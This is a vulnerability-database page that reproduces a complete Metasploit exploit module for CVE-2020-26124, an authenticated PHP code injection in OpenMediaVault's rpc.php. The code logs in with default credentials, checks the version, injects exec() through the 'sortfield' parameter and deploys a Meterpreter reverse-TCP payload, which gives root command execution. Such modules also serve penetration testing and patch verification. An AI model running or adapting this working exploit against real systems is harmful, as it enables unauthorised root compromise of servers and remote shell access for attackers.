Vulners
Lucene search
OpenMediaVault rpc.php Authenticated PHP Code Injection
🗓️ 25 Nov 2020 00:00:00Reported by Anastasios StasinopoulosType 
packetstorm🔗 packetstormsecurity.com👁 681 Views
| Reporter | Title | Published | Views | Family All 10 |
|---|---|---|---|---|
 | OpenMediaVault rpc.php Authenticated PHP Code Injection Exploit | 25 Nov 202000:00 | – | zdt |
 | CVE-2020-26124 | 24 Nov 202019:51 | – | circl |
 | CVE-2020-26124 | 2 Oct 202008:28 | – | cve |
 | CVE-2020-26124 | 2 Oct 202008:28 | – | cvelist |
 | OpenMediaVault rpc.php Authenticated PHP Code Injection | 25 Nov 202021:09 | – | metasploit |
 | CVE-2020-26124 | 2 Oct 202009:15 | – | nvd |
 | Openmediavault < 3.0.100, 4.x < 4.1.36, 5.x < 5.5.12 PHP Code Injection Vulnerability. | 25 Sep 202300:00 | – | openvas |
 | Code injection | 2 Oct 202009:15 | – | prion |
 | Metasploit Wrap-Up | 27 Nov 202016:22 | – | rapid7blog |
 | CVE-2020-26124 | 22 May 202515:23 | – | redhatcve |
10
`##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
prepend Msf::Exploit::Remote::AutoCheck
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStager
def initialize(info = {})
super(
update_info(
info,
'Name' => 'OpenMediaVault rpc.php Authenticated PHP Code Injection',
'Description' => %q{
This module exploits an authenticated PHP code injection
vulnerability found in openmediavault versions before 4.1.36
and 5.x versions before 5.5.12 inclusive in the "sortfield"
POST parameter of the rpc.php page, because "json_encode_safe()"
is not used in config/databasebackend.inc.
Successful exploitation grants attackers the ability to execute
arbitrary commands on the underlying operating system as root.
},
'Author' => [
'Anastasios Stasinopoulos' # @ancst of Obrela Labs Team - Discovery and Metasploit module
],
'References' => [
['CVE', '2020-26124'],
['URL', 'https://www.openmediavault.org/?p=2797']
],
'License' => MSF_LICENSE,
'Platform' => ['unix', 'linux'],
'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],
'Payload' => { 'BadChars' => "\x00" },
'DisclosureDate' => 'Sep 28 2020',
'Targets' =>
[
[
'Automatic (Linux Dropper)',
'Platform' => 'linux',
'Arch' => [ARCH_X86, ARCH_X64],
'DefaultOptions' => { 'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp' },
'Type' => :linux_dropper
]
],
'Privileged' => false,
'DefaultTarget' => 0
)
)
register_options(
[
OptString.new('TARGETURI', [true, 'The URI path of the OpenMediaVault installation', '/']),
OptString.new('USERNAME', [true, 'The OpenMediaVault username to authenticate with', 'admin']),
OptString.new('PASSWORD', [true, 'The OpenMediaVault password to authenticate with', 'openmediavault'])
]
)
end
def user
datastore['USERNAME']
end
def pass
datastore['PASSWORD']
end
def login(user, pass, _opts = {})
print_status("#{peer} - Authenticating with OpenMediaVault using #{user}:#{pass}...")
@uri = normalize_uri(target_uri.path, '/rpc.php')
res = send_request_cgi({
'uri' => @uri,
'method' => 'POST',
'ctype' => 'application/json',
'data' => {
"service": 'Session',
"method": 'login',
"params": {
"username": user.to_s,
"password": pass.to_s
},
"options": nil
}.to_json
})
unless res
# We return nil here, as callers should handle this case
# specifically with their own unique error message.
return nil
end
if res.code == 200 && res.body.scan('"authenticated":true,').flatten.first && res.get_cookies.scan(/X-OPENMEDIAVAULT-SESSIONID=(\w+);*/).flatten.first
@cookie = res.get_cookies
end
return res
rescue ::Rex::ConnectionError
print_error('Rex::ConnectionError caught in login(), could not connect to the target.')
return nil
end
def get_target
print_status("#{peer} - Trying to detect if target is running a supported version of OpenMediaVault.")
res = send_request_cgi({
'uri' => @uri,
'method' => 'POST',
'cookie' => @cookie.to_s,
'data' => {
"service": 'System',
"method": 'getInformation',
"params": nil,
"options": {
"updatelastaccess": false
}
}.to_json
})
version = res.body.scan(/"version\":\"(\d.\d.{0,1}\d{0,1}.{0,1}\d{0,1})/).flatten.first
if version.nil?
print_error("#{peer} - Unable to grab version of OpenMediaVault installed on target!")
return nil
end
print_good("#{peer} - Identified OpenMediaVault version #{version}.")
version_gemmed = Gem::Version.new(version)
if version_gemmed < Gem::Version.new('3.0.1')
return version
elsif version_gemmed >= Gem::Version.new('4.0.0') && version_gemmed < Gem::Version.new('4.1.36')
return version
elsif version_gemmed >= Gem::Version.new('5.0.0') && version_gemmed < Gem::Version.new('5.5.12')
return version
else
return nil
end
return version
end
def execute_command(cmd, _opts = {})
send_request_cgi({
'uri' => @uri,
'method' => 'POST',
'cookie' => @cookie.to_s,
'data' => {
"service": 'LogFile',
"method": 'getList',
"params": {
"id": 'apt_history',
"start": 0,
"limit": 50,
"sortfield": "'.exec(\"#{cmd}\").'",
"sortdir": 'DESC'
},
"options": nil
}.to_json
})
rescue ::Rex::ConnectionError
fail_with(Failure::Unreachable, 'Rex::ConnectionError caught in execute_command(), could not connect to the target.')
end
def check
res = login(user, pass)
unless res
return CheckCode::Unknown("No response was received from #{peer} whilst in check(), check it is online and the target port is open!")
end
if @cookie.nil?
return Exploit::CheckCode::Unknown("Failed to authenticate with OpenMediaVault on #{peer} using #{user}:#{pass}")
end
print_good("#{peer} - Successfully authenticated with OpenMediaVault using #{user}:#{pass}.")
version = get_target
if version.nil?
# We don't print out an error message here as returning this will
# automatically cause Metasploit to print out an appropriate error message.
return CheckCode::Safe
end
delay = rand(7...15)
cmd = "\").usleep(#{delay}0000).(\""
print_status("#{peer} - Verifying remote code execution by attempting to execute 'usleep()'.")
t1 = Time.now.to_i
res = execute_command(cmd)
t2 = Time.now.to_i
unless res
print_error("#{peer} - Connection failed whilst trying to perform the code injection.")
return CheckCode::Detected
end
diff = t2 - t1
if diff >= 3
print_good("#{peer} - Response received after #{diff} seconds.")
return CheckCode::Vulnerable
end
print_error("#{peer} - Response wasn't received within the expected period of time.")
return CheckCode::Safe
rescue ::Rex::ConnectionError
print_error("#{peer} - Rex::ConnectionError caught in check(), could not connect to the target.")
return CheckCode::Unknown
end
def exploit
print_status("#{peer} - Sending payload (#{payload.encoded.length} bytes)...")
execute_cmdstager(linemax: 130_000)
rescue ::Rex::ConnectionError
print_error('Rex::ConnectionError caught in exploit(), could not connect to the target.')
return false
end
end
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
25 Nov 2020 00:00Current
0.5Low risk
Vulners AI Score0.5
EPSS0.80279